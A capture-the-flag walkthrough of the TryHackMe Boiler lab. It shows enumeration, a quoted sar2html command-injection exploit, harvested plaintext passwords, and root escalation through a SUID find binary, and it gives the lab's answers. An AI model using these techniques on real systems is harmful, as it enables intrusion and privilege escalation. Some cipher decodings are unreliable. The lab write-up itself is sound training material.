TryHackMe-Boiler-CTF

From aldeid
Jump to navigation Jump to search

Boiler CTF

Intermediate level CTF

[Task 1] Questions #1

Intermediate level CTF. Just enumerate, you’ll get there.

#1 - File extension after anon login

The nmap full scan output:

21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.0.54
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)

anon refers to anonymous, for the FTP connection. Let’s connect as anonymous and list the files:

$ ftp 10.10.127.30
Connected to 10.10.127.30 (10.10.127.30).
220 (vsFTPd 3.0.3)
Name (10.10.127.30:unknown): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
227 Entering Passive Mode (10,10,14,231,166,133).
150 Here comes the directory listing.
226 Directory send OK.

Hum, nothing here, seriously? Let’s show hidden files:

ftp> ls -la
227 Entering Passive Mode (10,10,14,231,191,194).
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.
ftp> get .info.txt
local: .info.txt remote: .info.txt
227 Entering Passive Mode (10,10,14,231,194,215).
150 Opening BINARY mode data connection for .info.txt (74 bytes).
226 Transfer complete.
74 bytes received in 0.000871 secs (84.96 Kbytes/sec)
ftp> quit
221 Goodbye.

This time, there is a .info.txt file (the extension is txt, to answer the question). Let’s see what the file is.

$ file .info.txt 
.info.txt: ASCII text
$ cat .info.txt 
Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

The secret message is Just wanted to see if you find it. Pop. Remember: Enumeration is the key! (decrypted with https://quipqiup.com/).

Answer: txt

#2 - What is on the highest port?

SSH is running on the highest port (55007/tcp).

Answer: ssh

#3 - What’s running on port 10000?

When connecting to http://10.10.127.30:10000/, we are told that the service runs on https. Connecting to https://10.10.127.30:10000/ shows an authentication form to Webmin.

Answer: webmin

#4 - Can you exploit the service running on that port? (yay/nay answer)

Answer: nay

#5 - What’s CMS can you access?

robots.txt

There is a robots.txt file:

$ curl http://10.10.127.30/robots.txt
User-agent: *
Disallow: /

/tmp
/.ssh
/yellow
/not
/a+rabbit
/hole
/or
/is
/it

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

None of the URL exists. What about the encoded string?

$ python
>>> a = "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075"
''.join([chr(int(i)) for i in a.split(' ')])
>>> ''.join([chr(int(i)) for i in a.split(' ')])
'OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK'
>>> import base64
>>> base64.b64decode(_)
b'99b0660cd95adea327c54182baa51584\n'

The MD5 hash (99b0660cd95adea327c54182baa51584) is corresponding to the string kidding. This URL does not exist either.

Gobuster

The robots.txt was a wrong track. Let’s brute force the discovery with gobuster:

 gobuster dir -u http://10.10.127.30 -w /data/src/wordlists/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.127.30
[+] Threads:        10
[+] Wordlist:       /data/src/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/11 20:45:02 Starting gobuster
===============================================================
/manual (Status: 301)
/joomla (Status: 301)
...[SNIP]...

Joomla, that’s likely the CMS we are looking for!

Answer: joomla

#6 - Keep enumerating, you’ll know when you find it.

Hint: List & read, don’t reverse

Joomla has an administration part, available by appending /administrator to the URL (http://10.10.127.30/joomla/administrator/).

#7 - The interesting file name in the folder?

dirsearch

$ /data/src/dirsearch/dirsearch.py -u http://10.10.127.30/joomla/ -E -w /data/src/wordlists/directory-list-2.3-medium.txt 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 10 | Wordlist size: 220529

Error Log: /data/src/dirsearch/logs/errors-20-05-12_13-48-36.log

Target: http://10.10.127.30/joomla/

[13:48:36] Starting: 
[13:48:37] 301 -  322B  - /joomla/images  ->  http://10.10.127.30/joomla/images/
[13:48:37] 200 -   12KB - /joomla/
[13:48:37] 301 -  321B  - /joomla/media  ->  http://10.10.127.30/joomla/media/
[13:48:37] 301 -  325B  - /joomla/templates  ->  http://10.10.127.30/joomla/templates/
[13:48:38] 301 -  323B  - /joomla/modules  ->  http://10.10.127.30/joomla/modules/
[13:48:39] 403 -  299B  - /joomla/.hta
[13:48:39] 301 -  324B  - /joomla/_archive  ->  http://10.10.127.30/joomla/_archive/
[13:48:39] 301 -  325B  - /joomla/_database  ->  http://10.10.127.30/joomla/_database/
[13:48:39] 301 -  322B  - /joomla/_files  ->  http://10.10.127.30/joomla/_files/
[13:48:39] 301 -  321B  - /joomla/_test  ->  http://10.10.127.30/joomla/_test/
[13:48:39] 301 -  321B  - /joomla/tests  ->  http://10.10.127.30/joomla/tests/
[13:48:39] 301 -  319B  - /joomla/bin  ->  http://10.10.127.30/joomla/bin/
[13:48:40] 301 -  323B  - /joomla/plugins  ->  http://10.10.127.30/joomla/plugins/
[13:48:41] 301 -  324B  - /joomla/includes  ->  http://10.10.127.30/joomla/includes/
[13:48:42] 301 -  324B  - /joomla/language  ->  http://10.10.127.30/joomla/language/
[13:48:43] 301 -  326B  - /joomla/components  ->  http://10.10.127.30/joomla/components/
[13:48:43] 301 -  321B  - /joomla/cache  ->  http://10.10.127.30/joomla/cache/
[13:48:44] 301 -  325B  - /joomla/libraries  ->  http://10.10.127.30/joomla/libraries/
[13:48:51] 301 -  328B  - /joomla/installation  ->  http://10.10.127.30/joomla/installation/
[13:48:53] 301 -  321B  - /joomla/build  ->  http://10.10.127.30/joomla/build/
[13:48:55] 301 -  319B  - /joomla/tmp  ->  http://10.10.127.30/joomla/tmp/
[13:48:57] 301 -  323B  - /joomla/layouts  ->  http://10.10.127.30/joomla/layouts/
[13:49:08] 301 -  329B  - /joomla/administrator  ->  http://10.10.127.30/joomla/administrator/
[13:50:31] 301 -  319B  - /joomla/cli  ->  http://10.10.127.30/joomla/cli/

Task Completed

Wrong tracks

$ curl -s http://10.10.115.78/joomla/_files/ | html2text 
# VjJodmNITnBaU0JrWVdsemVRbz0K
$ echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d | base64 -d
Whopsie daisy
$ curl -s http://10.10.127.30/joomla/~www/ | html2text 
#  Mnope, nothin to see.
$ curl -s http://10.10.127.30/joomla/_archive/ | html2text 
#  Mnope, nothin to see.
[email protected]:/data/src/wordlists$ curl -s http://10.10.127.30/joomla/_database/ | html2text 
# Lwuv oguukpi ctqwpf.

which decodes to Time command spring (https://quipqiup.com/). Nothing interesting.

sar2html

sar2html http://10.10.127.30/joomla/_test/

Looking for information on sar2html on Google, I found this: https://packetstormsecurity.com/files/153858/Sar2HTML-3.2.1-Remote-Command-Execution.html:

# Exploit Title: sar2html Remote Code Execution
# Date: 01/08/2019
# Exploit Author: Furkan KAYAPINAR
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Centos 7

In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.

Ctf-tryhackme-Boiler-CTF-sar2html-exploit.png

Command ;ls -l

total 116
-rwxr-xr-x 1 www-data www-data 53430 Aug 22  2019 index.php
-rwxr-xr-x 1 www-data www-data   716 Aug 21  2019 log.txt
-rwxr-xr-x 1 www-data www-data 53165 Mar 19  2019 sar2html
drwxr-xr-x 3 www-data www-data  4096 Aug 22  2019 sarFILE

Command ;cat log.txt

Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on 0.0.0.0 port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:26 parrot sshd[2443]: Server listening on :: port 22.
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: [email protected]$$
Aug 20 11:16:35 parrot sshd[2451]: Accepted password for basterd from 10.1.1.1 port 49824 ssh2 #pass: [email protected]$$
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:35 parrot sshd[2451]: pam_unix(sshd:session): session opened for user pentest by (uid=0)
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Received disconnect from 10.10.170.50 port 49824:11: disconnected by user
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2466]: Disconnected from user pentest 10.10.170.50 port 49824
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 11:16:36 parrot sshd[2451]: pam_unix(sshd:session): session closed for user pentest
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.
Aug 20 12:24:38 parrot sshd[2443]: Received signal 15; terminating.

Let's try to connect over ssh (running on port 55007) with:

It works, we now have a ssh access.

Answer: log.txt

[Task 2] Questions #2

You can complete this with manual enumeration, but do it as you wish

#1 - Where was the other users pass stored(no extension, just the name)?

We are now connected over SSH with a customized shell. Let’s escape it:

$ /bin/bash 
[email protected]:/home$ 

basterd is not in the sudoers:

[email protected]:/usr/local$ sudo -l
[sudo] password for basterd: 
Sorry, user basterd may not run sudo on Vulnerable.
[email protected]:/home$ ls -l
total 8
drwxr-x--- 3 basterd basterd 4096 Aug 22  2019 basterd
drwxr-x--- 3 stoner  stoner  4096 Aug 22  2019 stoner
[email protected]:/home$ cd stoner/
bash: cd: stoner/: Permission denied
[email protected]:/home$ cd basterd/
[email protected]:~$ ls -ila
total 16
146309 drwxr-x--- 3 basterd basterd 4096 Aug 22  2019 .
130050 drwxr-xr-x 4 root    root    4096 Aug 22  2019 ..
278584 -rwxr-xr-x 1 stoner  basterd  699 Aug 21  2019 backup.sh
151978 -rw------- 1 basterd basterd    0 Aug 22  2019 .bash_history
130915 drwx------ 2 basterd basterd 4096 Aug 22  2019 .cache
[email protected]:~$ cat backup.sh 
REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log
 
DATE=`date +%y\.%m\.%d\.`

USER=stoner
#[email protected]$$no1knows

ssh [email protected]$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
         echo "Begining copy of" $i  >> $LOG
         scp  $SOURCE/$i [email protected]$REMOTE:$TARGET/$DATE
         echo $i "completed" >> $LOG
        
        if [ -n `ssh [email protected]$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
            rm $SOURCE/$i
            echo $i "removed" >> $LOG
            echo "####################" >> $LOG
                else
                    echo "Copy not complete" >> $LOG
                    exit 0
        fi 
    done
     

else

    echo "Directory is not present" >> $LOG
    exit 0
fi

The backup script discloses the password for the stoner user: * username: stoner * password: [email protected]$$no1knows

Answer: backup

#2 - user.txt

Now we can login as stoner:

[email protected]:/usr/local$ su - stoner
Password: 
[email protected]:~$ whoami
stoner
[email protected]:~$ cd 
[email protected]:~$ ls -ila
total 16
130093 drwxr-x--- 3 stoner stoner 4096 Aug 22  2019 .
130050 drwxr-xr-x 4 root   root   4096 Aug 22  2019 ..
151986 drwxrwxr-x 2 stoner stoner 4096 Aug 22  2019 .nano
279807 -rw-r--r-- 1 stoner stoner   34 Aug 21  2019 .secret
[email protected]:~$ cat .secret 
You made it till here, well done.

Answer: You made it till here, well done.

#3 - What did you exploit to get the privileged user?

Let’s list our privileges:

[email protected]:/home$ sudo -l
User stoner may run the following commands on Vulnerable:
    (root) NOPASSWD: /NotThisTime/MessinWithYa

OK, wrong track. Let’s see what executables are owned by root and have the SUID bit set:

$ find / -user root -perm -4000 -executable -type f 2>/dev/null
/bin/su
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping6
/bin/ping
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/newgidmap
/usr/bin/find
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/newuidmap

Oh oh… find is on the list. This command allows to execute actions, let’s exploit this.

Answer: find

#4 - root.txt

[email protected]:/$ find /root -exec ls /root \;
root.txt
root.txt
[email protected]:/$ find /root -exec cat /root/root.txt \;
It wasn't that hard, was it?
It wasn't that hard, was it?

Answer: It wasn't that hard, was it?